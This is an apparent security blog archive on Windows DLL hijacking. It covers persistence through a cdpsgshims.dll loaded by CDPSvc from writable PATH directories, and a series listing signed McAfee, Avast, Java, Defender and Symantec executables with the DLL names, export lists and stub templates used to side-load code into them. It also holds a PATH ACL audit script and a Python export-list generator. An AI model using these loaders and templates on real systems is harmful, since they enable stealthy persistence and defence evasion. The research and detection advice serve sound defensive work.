Windows 10 Persistence via PATH directories - CDPSvc

2019-01-13 00:00:00 +0000

TL;DR: CDPSvc searches the directories listed in the system PATH for cdpsgshims.dll and loads it if a file by that name is found.

CDPSvc is the Connected Devices Platform Service, enabled by default on Windows 10 (since 1607). cdpsgshims.dll is not shipped with Windows, so the loader's normal search order finds nothing in the system directories and falls through to the directories in the system PATH. If an attacker is able to write to any directory listed in the system PATH, dropping a DLL by that name gives persistence on the system as NT AUTHORITY\LocalService, the account the service runs under.

The issue is not treated as a security vulnerability but as a security-relevant misconfiguration: on a default Windows installation every directory in the system PATH is writable only by administrators, so there is nothing to exploit. It becomes exploitable as soon as third-party software or an administrator adds a directory that standard users can write to, which is why the check worth running is an ACL audit of every PATH entry (including entries that point to directories that do not exist, since whoever can create them controls the lookup). On the detection side, cdpsgshims.dll does not exist on a clean system, so any image load by that name is worth an alert.
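The following audit script is an added example and not part of the original post or of the CDPSvcPersist sample. It reads the machine PATH, walks each entry (or, when the entry does not exist, the nearest existing parent directory) and reports entries that a low-privileged principal can write to, based on the directory ACL. The principal list is an assumption to tune for your environment, and an ACL read is only an approximation of effective access: confirm a hit by creating a file there as a standard user.

```powershell
# Added example (not from the original post): find system PATH directories that a
# low-privileged user can write to; a cdpsgshims.dll planted there is picked up by
# CDPSvc. The principal list below is an assumption: tune it to your environment.
function Get-WritablePathDirs {
    [CmdletBinding()]
    param(
        [string[]]$Principals = @('Everyone', 'BUILTIN\Users',
                                  'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    )
    # WriteData (= CreateFiles) is the bit that lets a caller drop a new file;
    # Modify, Write and FullControl all include it, so one mask covers them.
    $writeBit = [int][System.Security.AccessControl.FileSystemRights]::WriteData

    $entries = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        ForEach-Object { $_.Trim() } | Where-Object { $_ }

    foreach ($entry in $entries) {
        $dir = [Environment]::ExpandEnvironmentVariables($entry)
        # A PATH entry that does not exist is still interesting: whoever can create
        # it owns every DLL lookup that falls through to it, so audit the nearest parent.
        $probe = $dir
        while ($probe -and -not (Test-Path -LiteralPath $probe)) {
            $probe = Split-Path -Path $probe -Parent
        }
        if (-not $probe) { continue }

        $allow = @(); $deny = @()
        foreach ($rule in (Get-Acl -LiteralPath $probe).Access) {
            if ($Principals -notcontains $rule.IdentityReference.Value) { continue }
            if (([int]$rule.FileSystemRights -band $writeBit) -eq 0) { continue }
            if ($rule.AccessControlType -eq 'Allow') { $allow += $rule.IdentityReference.Value }
            else                                     { $deny  += $rule.IdentityReference.Value }
        }
        # A Deny ACE wins over an Allow ACE for the same principal.
        $effective = $allow | Where-Object { $deny -notcontains $_ } | Sort-Object -Unique
        if ($effective) {
            [pscustomobject]@{
                PathEntry   = $entry
                CheckedPath = $probe
                Exists      = ($probe -eq $dir)
                WritableBy  = ($effective -join ', ')
            }
        }
    }
}

Get-WritablePathDirs | Format-Table -AutoSize
```

Run it from an elevated shell so every ACL can be read. An empty result on a default installation is the expected outcome; any row is a candidate for the persistence described above and should be fixed by tightening the ACL or removing the entry from the system PATH.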

Download: A sample DLL (source included) that executes calc.exe is available here: CDPSvcPersist


DLL Side-Loading for Fun (and Profit?) - Day 7

2019-01-07 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

Continuing with the big names in the security-product market, the FWInstCheck.exe tool shipped with McAfee Endpoint Security can be used to side-load our own code as cryptbase.dll, exporting the SystemFunction* names listed in the template below. This works because the loader searches the executable's own directory before System32; it would not work for a DLL on the KnownDLLs list, which is always taken from System32 regardless of what sits next to the executable.

  • Name: McAfee Endpoint Security (x64)
  • Executable: FWInstCheck.exe
  • SHA256: 1ea5f32debb79f98c23918e8c246eddab323b2760696abbeafaf30c454c39982
  • SHA1: fe00e9375ac7fb3ca90ae7ed3fcd9670a3575409
  • MD5: a872d5f425658524b7dbc8972f670042
  • Certificate: McAfee, Inc./VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190107                                                   *
; * Last Update: 20190107                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  ; Sleep(INFINITE): park the calling thread so the stub never returns a bogus
  ; result to the host, and the signed process stays alive with our DLL mapped.
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  ; Emit the procedure name to the debugger (DebugView etc.) to see which of
  ; the declared exports the host actually calls.
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ; Declare an export with the name the host's import table asks for; the
  ; body just logs the call and blocks.
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: cryptbase.dll - FWInstCheck.exe (McAfee Firewall Installer check exe)

DummyExport(SystemFunction001)
DummyExport(SystemFunction002)
DummyExport(SystemFunction003)
DummyExport(SystemFunction004)
DummyExport(SystemFunction005)
DummyExport(SystemFunction028)
DummyExport(SystemFunction029)
DummyExport(SystemFunction034)
DummyExport(SystemFunction036)
DummyExport(SystemFunction040)
DummyExport(SystemFunction041)

; ---------------------------------------------------------------------------

DummyExport(AttachProcess) ; -- just to block on AttachProcess (DllMain / DLL_PROCESS_ATTACH)...
                           ;    note: this blocks while the loader lock is held, which is fine for
                           ;    a sleep-forever stub but not for a payload that needs to load DLLs

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 5 & 6

2019-01-06 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

Since I forgot to post yesterday, I merged the two posts. Below you'll find DLL side-loading targets using Oracle Java and Avast Antivirus Business.

For Oracle Java the DLL template is provided below. For the Avast target, just create a DLL named wsc.dll with one export (called [email protected]), place it next to wsc_proxy.exe and execute wsc_proxy.exe.

Avast Antivirus Business (x86)

  • Name: Avast - Antivirus Business(x86)
  • Executable: wsc_proxy.exe
  • SHA256: 81aa1e5578e99de5d99d775910704aa1e92b50139fc1a1a9a5fb1d60a3a7897e
  • SHA1: 03aaf714728eae7ba833bdf36be15a3136f4bb46
  • MD5: 39f551472d83951eae833db975991219
  • Certificate: AVAST Software s.r.o./DigiCert High Assurance Code Signing CA-1/DigiCert High Assurance EV Root CA

Oracle Java (x64)

DLL-Template (Java):

EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  ; Sleep(INFINITE): park the calling thread so the stub never returns a bogus
  ; result to the host, and the signed process stays alive with our DLL mapped.
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  ; Emit the procedure name to the debugger (DebugView etc.) to see which of
  ; the declared exports the host actually calls.
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ; Declare an export with the name the host's import table asks for; the
  ; body just logs the call and blocks.
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: deploy.dll - javacpl.exe

DummyExport(GetCurrentJavaHomeFromRegistry)

; ---------------------------------------------------------------------------
;- Exports: jli.dll for java-rmi.exe and others

DummyExport(JLI_CmdToArgs)
DummyExport(JLI_GetStdArgc)
DummyExport(JLI_GetStdArgs)
DummyExport(JLI_Launch)
DummyExport(JLI_MemAlloc)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 4

2019-01-04 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

My all-time favorite side-loading target is Windows Defender: the executable (MsMpEng.exe) is usually already on the system, so you only need to copy it into a folder you control and place your DLL, named mpsvc.dll with a single export (ServiceCrtMain), next to it. The copy is what matters: in its original location the directory is not writable, next to your copy the loader finds your mpsvc.dll first.

  • Name: Microsoft Windows Defender (x64)
  • Executable: MsMpEng.exe
  • SHA256: a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6
  • SHA1: fdb29638944a097d83c8c3442970287a890a0a03
  • MD5: ed70edcc4107f3727973c312e0049bd5
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

  • Name: Microsoft Windows Defender (x86)
  • Executable: MsMpEng.exe
  • SHA256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • SHA1: 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • MD5: 8cc83221870dd07144e63df594c391d9
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190104                                                   *
; * Last Update: 20190104                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  ; Sleep(INFINITE): park the calling thread so the stub never returns a bogus
  ; result to the host, and the signed process stays alive with our DLL mapped.
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  ; Emit the procedure name to the debugger (DebugView etc.) to see which of
  ; the declared exports the host actually calls.
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ; Declare an export with the name the host's import table asks for; the
  ; body just logs the call and blocks.
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: mpsvc.dll - MsMpEng.exe (Microsoft Malware Protection Antimalware Service Executable)

DummyExport(ServiceCrtMain)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 3

2019-01-03 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

Today we have some fun with Symantec: Symantec Endpoint Protection Manager ships two loaders and a signed (outdated) PHP build that we can use for side-loading via php5.dll, using the exports listed in the template below.

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: php-win.exe
  • SHA256: 20790464a0eac6d2459dae4b23fa8f46c48f9b9ea797f1af6870bf80253d680a
  • SHA1: af15e83af6c5c923d2f8788477c25d15790f944f
  • MD5: 30e32444dc23b3a620f698dee1f21749
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: SaSetupWrapper.exe
  • SHA256: 8a0f418918e85183c899682ec6016f1c0f5da50ac2a39a39d27b50275aacedea
  • SHA1: 7991234464368fc10131bf937f7d7aecb9627da4
  • MD5: 89eee4675e3aef28ea8cc425f33410c7
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: WinExec.exe
  • SHA256: ba627a7f09c24b617884e303b4c4b4a92b1f2f78ac45a24ac21b5d27b387c457
  • SHA1: 4f5f19c914fc47bb472ce306820a5f86e0c181d4
  • MD5: f95b6fb7ba455d76d647b6a67b7f5cf3
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

Loaders:

  • WinExec.exe calc.exe (runs the command passed on its command line)
  • SaSetupWrapper.exe, which loads setup.exe from the same folder

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190103                                                   *
; * Last Update: 20190103                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  ; Sleep(INFINITE): park the calling thread so the stub never returns a bogus
  ; result to the host, and the signed process stays alive with our DLL mapped.
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  ; Emit the procedure name to the debugger (DebugView etc.) to see which of
  ; the declared exports the host actually calls.
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ; Declare an export with the name the host's import table asks for; the
  ; body just logs the call and blocks.
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: php5.dll - php-win.exe (Symantec Endpoint Protection Manager)

DummyExport(php_error_docref0)
DummyExport(zend_parse_parameters)
DummyExport(php_ini_scanned_files)
DummyExport(php_ini_scanned_path)
DummyExport(php_ini_opened_path)
DummyExport(zend_extensions)
DummyExport(reflection_zend_extension_ptr)
DummyExport(reflection_extension_ptr)
DummyExport(reflection_method_ptr)
DummyExport(reflection_class_ptr)
DummyExport(reflection_function_ptr)
DummyExport(reflection_ptr)
DummyExport(php_import_environment_variables)
DummyExport(sapi_globals)
DummyExport(sapi_module)
DummyExport(core_globals)
DummyExport(module_registry)
DummyExport(executor_globals)
DummyExport(compiler_globals)
DummyExport(zend_printf)
DummyExport(php_getopt)
DummyExport(zend_exception_get_default)
DummyExport(php_info_print_module)
DummyExport(php_print_info)
DummyExport(php_get_highlight_struct)
DummyExport(zend_strip)
DummyExport(zend_highlight)
DummyExport(php_lint_script)
DummyExport(php_execute_script)
DummyExport(php_module_shutdown)
DummyExport(php_module_startup)
DummyExport(php_request_shutdown)
DummyExport(php_request_startup)
DummyExport(zend_load_extension)
DummyExport(zend_call_method)
DummyExport(php_register_variable)
DummyExport(sapi_deactivate)
DummyExport(sapi_shutdown)
DummyExport(sapi_startup)
DummyExport(zend_register_constant)
DummyExport(tsrm_realpath)
DummyExport(display_ini_entries)
DummyExport(zend_ini_deactivate)
DummyExport(_php_stream_open_wrapper_ex)
DummyExport(_php_stream_get_line)
DummyExport(_php_stream_free)
DummyExport(php_output_end_all)
DummyExport(php_output_write)
DummyExport(php_printf)
DummyExport(_object_init_ex)
DummyExport(zend_read_property)
DummyExport(zend_eval_string_ex)
DummyExport(zend_is_auto_global)
DummyExport(open_file_for_scanning)
DummyExport(zend_qsort)
DummyExport(_zval_ptr_dtor)
DummyExport(zend_str_tolower_dup)
DummyExport(gc_remove_zval_from_buffer)
DummyExport(get_zend_version)
DummyExport(zend_llist_sort)
DummyExport(zend_llist_apply)
DummyExport(zend_llist_copy)
DummyExport(zend_llist_destroy)
DummyExport(zend_hash_sort)
DummyExport(zend_hash_copy)
DummyExport(zend_hash_find)
DummyExport(zend_hash_apply)
DummyExport(_zend_hash_add_or_update)
DummyExport(zend_hash_destroy)
DummyExport(_zend_hash_init)
DummyExport(_estrndup)
DummyExport(_efree)
DummyExport(_emalloc)
DummyExport(zend_strndup)
DummyExport(zif_dl)
DummyExport(zend_error)
DummyExport(php_module_shutdown_wrapper)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure
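The export lists in this template and in the Day 4, Day 5 & 6 and Day 7 templates above come straight from the import table of the signed executable. The script below is an added example, not code from these posts: a stdlib-only Python tool that walks a PE's import directory (PE32 and PE32+) and prints the DummyExport() lines for the DLL name you want to side-load. build_test_pe() is a constructed fixture whose DLL and symbol names are illustrative, so the script can be exercised offline without a real binary; the file name sideload_exports.py in the usage comment is hypothetical.

```python
# Added example (not code from the original posts): read the signed EXE's import
# table to recover the exports its side-loaded DLL must provide, then emit the
# DummyExport() lines for the PureBasic template. Stdlib only; build_test_pe()
# is a constructed fixture so the script can be exercised without a real binary.
import struct
import sys

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

def _rva_to_offset(rva, sections):
    """Translate an RVA to a file offset via the section table."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is outside every section" % rva)

def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")

def list_imports(data):
    """Return {dll: [symbol, ...]} from the import directory (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    plus = magic == PE32PLUS_MAGIC  # PE32+: 8-byte thunks, data directories at +112
    dd, thunk_fmt, ord_flag = (opt + 112, "<Q", 1 << 63) if plus else (opt + 96, "<I", 1 << 31)
    import_rva = struct.unpack_from("<I", data, dd + 8)[0]  # data directory[1]
    # section table follows the optional header; VirtualSize/VirtualAddress/
    # SizeOfRawData/PointerToRawData start 8 bytes into each 40-byte entry
    sections = [struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
                for i in range(nsec)]
    result = {}
    if import_rva == 0:
        return result
    desc = _rva_to_offset(import_rva, sections)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if oft == 0 and name_rva == 0 and ft == 0:  # all-zero descriptor ends the list
            break
        thunk = _rva_to_offset(oft or ft, sections)  # prefer the INT, else walk the IAT
        names = []
        while True:
            entry = struct.unpack_from(thunk_fmt, data, thunk)[0]
            if entry == 0:
                break
            if entry & ord_flag:
                names.append("ordinal#%d" % (entry & 0xFFFF))
            else:  # +2 skips the hint word in front of the name
                names.append(_cstr(data, _rva_to_offset(entry, sections) + 2))
            thunk += struct.calcsize(thunk_fmt)
        result[_cstr(data, _rva_to_offset(name_rva, sections))] = names
        desc += 20
    return result

def purebasic_template(dll, symbols):
    """DummyExport() lines for by-name imports; ordinal imports need a .def file."""
    lines = [";- Exports: %s" % dll]
    lines += ["DummyExport(%s)" % s for s in symbols if not s.startswith("ordinal#")]
    return "\n".join(lines)

def build_test_pe(imports):
    """Constructed fixture: minimal PE32+ whose single section is an import directory."""
    base, raw = 0x1000, 0x200
    body = bytearray((len(imports) + 1) * 20)  # descriptor array, zero-terminated
    for i, (dll, syms) in enumerate(imports.items()):
        hint_names = []
        for s in syms:
            hint_names.append(base + len(body))
            body += b"\0\0" + s.encode("ascii") + b"\0"
        name_rva = base + len(body)
        body += dll.encode("ascii") + b"\0"
        body += b"\0" * (-len(body) % 8)
        int_rva = base + len(body)
        body += b"".join(struct.pack("<Q", r) for r in hint_names) + struct.pack("<Q", 0)
        iat_rva = base + len(body)
        body += body[int_rva - base:iat_rva - base]  # IAT starts as a copy of the INT
        struct.pack_into("<IIIII", body, i * 20, int_rva, 0, 0, name_rva, iat_rva)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(struct.pack("<H", PE32PLUS_MAGIC) + b"\0" * 238)
    struct.pack_into("<II", opt, 112 + 8, base, (len(imports) + 1) * 20)
    sec = struct.pack("<8sIIIIIIHHI", b".idata", len(body), base, len(body), raw, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + opt + sec
    return bytes(hdr + b"\0" * (raw - len(hdr)) + body)

if __name__ == "__main__":
    exe, dll = sys.argv[1:3]  # e.g. python sideload_exports.py MsMpEng.exe mpsvc.dll
    with open(exe, "rb") as f:
        imports = list_imports(f.read())
    syms = next((v for k, v in imports.items() if k.lower() == dll.lower()), [])
    print(purebasic_template(dll, syms))
```

Two caveats when using this against a real target: imports by ordinal cannot be expressed with the DummyExport() macro and need a .def file that exports the matching ordinal, and the script reads only the regular import directory, so a DLL the host pulls in via delay-load (data directory 13) or resolves at runtime with LoadLibrary/GetProcAddress will not show up in the output.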

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


About this site // disclaimer

This is my personal blog. The views expressed on these pages are mine alone and not those of my employer or former employers. Views may change over time, become outdated or even invalid, and therefore may not represent my current views. All information is provided as-is. If not otherwise stated the content is provided under the 2-clause BSD License.

Follow me on Twitter @markus_pieton